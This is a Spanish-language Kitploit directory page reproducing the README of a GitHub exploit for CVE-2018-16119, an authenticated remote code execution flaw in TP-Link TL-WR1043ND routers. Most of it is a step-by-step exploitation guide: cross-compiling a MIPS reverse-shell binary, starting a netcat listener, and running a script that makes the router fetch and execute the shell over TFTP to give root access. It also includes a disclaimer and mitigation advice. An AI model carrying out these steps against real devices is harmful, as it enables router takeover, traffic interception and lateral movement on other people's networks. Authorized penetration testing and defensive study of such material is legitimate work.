Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-16119 — TP-Link TL-WR1043ND - Ejecución Remota de Código Autenticada | Kitploit
Herramientas/GitHubGitHub/hdbreaker/cve-2018-16119
Seguridad de Sistemas EmbebidosSeguridad IoTExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de HardwareAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND - Ejecución Remota de Código Autenticada

163hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web

CVE-2018-16119: Ejecución Remota de Código Autenticada en TP-Link WR1043ND

Resumen

CVE-2018-16119 es una vulnerabilidad crítica de ejecución remota de código autenticada que afecta a los routers TP-Link TL-WR1043ND. Esta vulnerabilidad permite a atacantes autenticados ejecutar comandos arbitrarios en el dispositivo objetivo con privilegios de root, lo que podría llevar al compromiso total del sistema.

Detalles del CVE: CVE-2018-16119

Impacto de la Vulnerabilidad

  • Vector de Ataque: Red
  • Complejidad del Ataque: Baja
  • Privilegios Requeridos: Bajos (Autenticación necesaria)
  • Interacción del Usuario: Ninguna
  • Alcance: Cambiado
  • Impacto: Compromiso total de la confidencialidad, integridad y disponibilidad del dispositivo

Una vez explotada, un atacante obtiene acceso a la shell root del router, lo que le permite:

  • Modificar configuraciones del router
  • Monitorizar tráfico de red
  • Usar el dispositivo como punto de pivote para movimiento lateral
  • Instalar puertas traseras persistentes
  • Interrumpir la conectividad de red

Dispositivos Afectados

  • TP-Link TL-WR1043ND (múltiples versiones de firmware)
  • Potencialmente otros dispositivos TP-Link que utilicen firmware similar

Requisitos Previos

Requisitos del Sistema

  • Host Linux con privilegios de root (necesario para el servidor TFTP en el puerto 69)
  • Docker (para compilación cruzada)
  • Conectividad de red con el dispositivo objetivo
  • Credenciales de autenticación válidas para el router objetivo

Dependencias

root@kitploit:~
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io

Guía de Explotación

Paso 1: Compilar el Payload de Reverse Shell

El exploit requiere un binario de reverse shell MIPS big-endian. Sigue estos pasos para compilarlo:

root@kitploit:~
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

Dentro del contenedor Docker:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

Salir de Docker y copiar el binario compilado:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

Paso 2: Configurar el Listener de Reverse Shell

Abre una terminal e inicia un listener netcat en el puerto 9669:

Linux:

root@kitploit:~
nc -l -p 9669 -vv

macOS:

root@kitploit:~
nc -l 9669 -vv

Paso 3: Ejecutar el Exploit

Ejecuta el script del exploit con privilegios de root (necesario para el servidor TFTP):

root@kitploit:~
sudo python3 exploit/exploit.py

El script hará lo siguiente:

  1. Autenticarse en el router objetivo
  2. Iniciar un servidor TFTP en el puerto 69
  3. Explotar la vulnerabilidad para descargar y ejecutar la reverse shell
  4. Establecer una conexión de vuelta a tu listener

Paso 4: Interactuar con la Shell

Una vez que se establece la conexión:

  • Tendrás acceso root al router
  • No se mostrará salida detallada inicialmente
  • Simplemente empieza a escribir comandos para interactuar con la shell

Estructura del Proyecto

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # Main exploit script
│   ├── requirements.txt        # Python dependencies
│   ├── notes.txt              # Additional notes
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # Reverse shell source code
│       └── shh                     # Compiled MIPS binary
├── firmware/
│   └── wr740nv4_webrevert.bin     # Sample firmware
├── squashfs-root/                  # Extracted firmware filesystem
└── README.md                       # This file

Consideraciones de Seguridad

Divulgación Responsable

Esta vulnerabilidad ha sido divulgada de manera responsable y solo debe utilizarse para:

  • Pruebas de penetración autorizadas
  • Investigación de seguridad en entornos controlados
  • Fines educativos

Aviso Legal

⚠️ ADVERTENCIA: Este exploit se proporciona únicamente con fines educativos y de pruebas autorizadas. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de usar esta herramienta.

Recomendaciones de Mitigación

  • Actualizar a la última versión de firmware
  • Cambiar las credenciales administrativas predeterminadas
  • Deshabilitar la gestión remota si no es necesaria
  • Implementar segmentación de red
  • Monitorizar actividad de red sospechosa

Dependencias

Instalar requisitos de Python:

root@kitploit:~
pip3 install -r exploit/requirements.txt

Solución de Problemas

Problemas Comunes

Permiso Denegado del Servidor TFTP:

  • Asegurarse de que el script se ejecute con privilegios de root
  • Verificar que el puerto 69 no esté ya en uso

Conexión Fallida:

  • Verificar la conectividad de red con el objetivo
  • Confirmar que las credenciales de autenticación sean correctas
  • Verificar la configuración del cortafuegos

Sin Respuesta de la Shell:

  • La shell puede tardar un momento en inicializarse
  • Intentar presionar Enter o escribir comandos básicos como id o pwd

Investigación y Desarrollo

Esta investigación demuestra fallos críticos de seguridad en el firmware de dispositivos integrados. La vulnerabilidad destaca la importancia de:

  • Prácticas de codificación segura en sistemas integrados
  • Auditorías de seguridad periódicas de dispositivos IoT
  • Actualizaciones oportunas de firmware y gestión de parches

Referencias

  • Entrada Oficial de CVE-2018-16119
  • Avisos de Seguridad de TP-Link

Contacto y Atribución

Investigación por: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi


Esta investigación se realizó con fines educativos y para mejorar la seguridad de los sistemas integrados. Por favor, úsala de manera responsable.

Descargar herramienta